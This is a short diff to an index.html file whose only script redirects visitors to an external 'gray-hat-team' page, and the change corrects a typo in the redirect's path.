--- a/index.html
+++ b/index.html
@@ -1,3 +1,3 @@
 <script type="text/javascript">
-	document.location='http://gray-hat-team.freeweb.pk/unque-collection/'
+	document.location='http://gray-hat-team.freeweb.pk/unique-collection/'
 </script>
